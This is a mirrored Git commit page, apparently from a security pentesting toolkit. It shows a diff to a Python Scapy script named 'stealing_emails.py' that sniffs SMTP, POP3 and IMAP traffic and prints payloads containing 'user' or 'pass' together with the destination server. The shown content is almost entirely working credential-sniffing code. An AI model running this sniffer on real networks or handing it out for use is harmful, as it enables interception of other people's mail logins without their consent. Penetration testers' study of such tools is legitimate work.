mirror of
https://github.com/autistic-symposium/sec-pentesting-toolkit.git
synced 2025-05-03 15:24:59 -04:00
some scapy scripts
This commit is contained in:
parent
d29d4e115d
commit
2acc68c3dd
10 changed files with 171 additions and 17 deletions
30
Network_and_802.11/scapy/stealing_emails.py
Executable file → Normal file
30
Network_and_802.11/scapy/stealing_emails.py
Executable file → Normal file
|
@ -5,26 +5,22 @@ __author__ = "bt3"
|
|||
''' A simple sniffer to capture SMTP, POP3, IMAP credentials'''
|
||||
|
||||
|
||||
''''
|
||||
DOCUMENTATION:
|
||||
# sniffer that dissects and dumps the packets out
|
||||
# filter allows to specify a BPF, wireshark style to packets,
|
||||
# for example, to sniff all HTTP packets you use a BPF filter of tcp
|
||||
# and port 80
|
||||
# iface parameter tells the sniffer which network interface to sniff on
|
||||
# prn parameter specifies a callback function to every packet that matches the filter
|
||||
# and it will receive packet as its single parameter
|
||||
# count specifies how many packets you want to sniff (blank: infinite)
|
||||
sniff(filter'', iface='any', prn=function, count=N)
|
||||
'''
|
||||
|
||||
|
||||
from scapy.all import *
|
||||
|
||||
# our packet callback
|
||||
def packet_callback(packet):
|
||||
print packet.show()
|
||||
|
||||
# fire up the sniffer
|
||||
# check to make sure it has a data payload
|
||||
if packet[TCP].payload:
|
||||
mail_packet = str(packet[TCP].payload)
|
||||
if 'user' in mail_packet.lower() or 'pass' in mail_packet.lower():
|
||||
print '[*] Server: %s' % packet[IP].dst
|
||||
print '[*] %s' %packet[TCP].payload
|
||||
|
||||
|
||||
|
||||
# fire up the sniffer on all interfaces, with no filtering
|
||||
# store 0 ensures that the packets are not kept in memory (good when
|
||||
# leaving a long term sniffer running, so wont consume too much ram)
|
||||
sniff(filter="tcp port 110 or tcp port 25 or tcp port 143", prn=packet_callback, store=0)
|
||||
|
||||
|
||||
|
|
Loading…
Add table
Add a link
Reference in a new issue